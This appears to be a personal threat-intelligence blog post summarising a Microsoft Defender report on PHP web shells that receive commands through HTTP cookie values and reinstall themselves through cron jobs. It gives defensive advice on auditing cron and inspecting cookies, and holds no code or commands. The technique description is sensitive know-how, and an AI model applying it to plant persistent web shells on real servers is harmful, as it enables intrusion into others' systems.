my photo

John Z Black

Brunswick, ME • (207) 245-1010 • contact@johnzblack.com

Delete This Web Shell and It Grows Back. Thanks, Cron.

John Z Black Apr 4, 2026 Threat Intelligence #webshell #php #cookie-c2 #linux #persistence #microsoft-defender

Microsoft’s Defender team just documented a PHP web shell technique that should bother every Linux web server admin. Attackers issue commands through HTTP cookie values instead of URL parameters or POST bodies. Your WAF probably can’t see it. Your logs look clean.

But the real problem? Delete the shell and it comes back.

Traditional web shells pass commands through URLs or POST data. Security tools have gotten good at catching those. So attackers moved to PHP’s $_COOKIE superglobal. Set a cookie with the command, send a normal-looking request, shell executes whatever’s in the cookie. No suspicious parameters. No weird POST body. Just a cookie that looks like session data.

Microsoft found three variants. One uses layered obfuscation. Another splits commands across multiple cookie values. The third triggers on a single cookie marker. All invisible to most defensive tooling.

Now here’s the nasty part. These shells install cron jobs that monitor for their own removal. Delete the PHP file? Cron recreates it on schedule. You can scrub your web directory top to bottom and the infection regenerates automatically. It’s not sophisticated in concept. Cron is as basic as Linux gets. But it wrecks incident response teams that clean the web root and call it done.

Cleaning a web shell without auditing cron is like mopping the floor while the pipe’s still leaking.

Initial access comes through the usual suspects: stolen credentials and unpatched software. No zero-days needed. Microsoft didn’t attribute this to any specific group, which actually makes it scarier. This tradecraft is available to anyone paying attention.

What to do: Check cron on every Linux web server. Not just compromised ones. Review your WAF rules for cookie inspection. Enforce MFA on hosting panels and SSH. And stop treating web shell cleanup as “find file, delete file, done.” Any remediation that skips persistence mechanisms is incomplete. Period.

How cookie-based C2 and self-healing persistence are changing web shell attacks